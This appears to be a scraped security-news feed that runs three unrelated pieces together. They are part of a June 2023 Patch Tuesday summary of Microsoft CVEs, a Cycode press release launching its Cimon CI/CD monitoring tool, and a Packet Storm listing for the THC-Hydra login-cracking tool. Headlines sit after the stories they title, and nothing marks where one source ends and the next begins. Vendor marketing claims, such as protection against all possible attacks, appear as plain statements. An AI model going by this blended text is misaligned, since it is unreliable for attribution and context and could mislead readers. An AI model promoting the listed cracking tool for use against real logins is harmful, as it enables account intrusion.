CVE-2023-32013 (CVSS score: 6.5 out of 10): a Windows Hyper-V Denial of Service (DoS) vulnerability. Successful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.

Hyper-V is Microsoft's hardware virtualization product. It lets you create and run virtual machines, which are software emulations of a computer system.

CVE-2023-24897 (CVSS score: 7.8 out of 10): a .NET, .NET Framework, and Visual Studio Remote Code Execution (RCE) vulnerability. The word "Remote" refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE) because the attack itself is carried out locally.

I’d like to throw one important vulnerability in the mix because we expect to hear more about it, because it is, well, you know, Exchange.

CVE-2023-32031 (CVSS score: 8.8 out of 10): a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability. An attacker could target the server accounts in an arbitrary or remote code execution. As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call.

This is typically a vulnerability that is used in a chained attack, because the attacker will need access to a vulnerable host in the network to gain the necessary authentication they need to successfully exploit this vulnerability.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

*   Cisco released security updates for several products
*   Google released security updates for Google Chrome
*   Google also released its Android June 2023 updates
*   SAP has released its June 2023 Patch Day updates
*   VMware released VMware ESXi updates

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Microsoft fixes six critical vulnerabilities in June Patch Tuesday

**SAN FRANCISCO, June 12, 2023** – Cycode, the leading application security platform, today announced the launch of Cimon, a seamless solution that enhances the security of CI/CD pipelines to prevent software supply chain attacks such as those that targeted SolarWinds and Codecov.  

CI/CD pipelines currently lack visibility, making them the most sensitive link in the SDLC, and many organizations have thousands of unmonitored pipelines prone to supply chain attacks. Cimon stops these attacks by utilizing the innovative solution of eBPF (extended Berkeley Packet Filter), a technology that provides visibility into the build system, including thwarting malicious behavior, with minimal disruption.

With this visibility, Cimon can inspect - network connections, running processes and file modifications within the CI pipeline — to learn standard behaviors. This knowledge enables Cimon to detect and prevent abnormalities, including real-time threats and zero-day attacks.  

"We offer free and easy integration with many CI/CD tools for organizations to secure their pipelines without delay time or errors," said Ronen Slavin, co-founder and CTO of Cycode. "As Cimon saves time in vulnerability and threat response procedures, teams can implement and adopt security measures without worry of error or exhaustion."

With Cimon, organizations can expect: 

● **Prevention of CI Attacks:** With low effort and seamless integration, users remain protected against all possible attacks on the CI pipeline, including zero-day attacks 

● **Instant Threat Detection:** Cimon prevents attacks such as malicious package installation, typosquatting, repojacking, dependency confusion, dependency hijacking and other dependency attacks 

● **Easy Integration:** Cimon is developer friendly and is easily integrated with popular CI/CD tools, comprehensive documentation requiring minimal configuration and integration with the development environment, such as GitHub 

Cimon is the new superhero for organizations' CI/CD pipelines and is free to use. More information about Cycode and Cimon is available online. 

**About Cycode**

Cycode's modern approach to application security enables organizations to effectively secure their cloud-native applications with cost-efficient use of tooling and staff across the SDLC. The Cycode platform makes AppSec tools better through its Knowledge Graph, which provides complete context of the SDLC to improve accuracy and reduce mean-time-to-remediation (MTTR). Cycode merges the top eight AppSec tools into the industry’s most advanced and comprehensive AppSec platform. By correlating data across these tools Cycode offers new capabilities, like Pipeline Composition Analysis which identifies vulnerable dependencies and security issues missed by legacy tools like SCA and SAST — across the entire SDLC; pinpoints vulnerable dependency locations; and prioritizes threats by exploitability.

Cycode Launches CI/CD Pipeline Monitoring Solution (Cimon) to Prevent Supply Chain Attacks

THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus.

**Hydra Network Logon Cracker 9.5**

Posted Jun 13, 2023

Authored by van Hauser, thc | Site thc.org

THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus.

Changes: 2 updates to http-form, 1 fix for smb2, 1 fix for smtp, and 1 fix for rdp.

tags | tool, web, imap

systems | cisco, unix

SHA-256 | 9dd193b011fdb3c52a17b0da61a38a4148ffcad731557696819d4721d1bee76b

Download | Favorite | View

Tag

#cisco